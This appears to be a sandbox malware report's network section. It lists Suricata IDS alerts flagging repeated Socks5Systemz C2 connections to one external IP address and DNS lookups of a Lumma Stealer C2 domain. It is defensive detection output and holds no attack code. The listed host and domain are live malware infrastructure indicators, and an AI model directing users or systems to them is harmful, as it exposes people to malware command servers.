Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50196 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50184 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50182 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50185 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50184 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50185 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50187 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50193 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50200 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50193 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50178 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50187 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50178 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50204 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50204 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50216 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50200 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50214 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2057396 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (frogmen-smell .sbs) : 192.168.2.4:54831 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50214 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50203 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50203 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50213 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50216 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50213 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50227 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50231 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50227 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50220 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50221 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50220 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50239 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50239 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50248 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50248 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50206 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50206 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50217 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50231 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50250 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50221 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50250 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50224 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50224 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50217 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50210 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50226 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50226 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50210 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50238 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50238 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50234 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50234 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50235 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50235 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50243 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50243 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50223 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50223 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50201 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50201 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50257 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50264 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50264 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50263 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50263 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50257 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50266 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50259 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50253 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50266 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50253 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50259 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50261 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50267 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50267 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50261 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50219 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50219 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50256 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50256 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50230 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50230 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2057396 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (frogmen-smell .sbs) : 192.168.2.4:53739 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50273 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50273 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50279 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50279 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50282 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50282 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50260 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50260 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50283 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50283 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50286 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50286 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50272 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50272 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50271 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50281 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50281 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50303 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50293 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50318 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50303 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50293 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50311 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50311 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50278 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50291 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50318 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50278 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50336 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50331 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50285 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50339 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50285 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50297 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50315 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50315 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50321 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50297 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50291 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50334 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50325 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50325 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50299 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50336 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50271 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50334 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50345 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50289 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50289 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50321 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50339 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50299 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50365 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50366 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50365 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50301 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50301 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50362 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50380 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50359 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50328 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50359 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50345 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50332 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50347 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50347 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50366 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50331 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50380 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50368 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50355 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50305 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50328 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50305 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50346 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:50349 -> 185.208.158.202:80
Source: Network traffic	Suricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:50349 -> 185.208.158.202:80
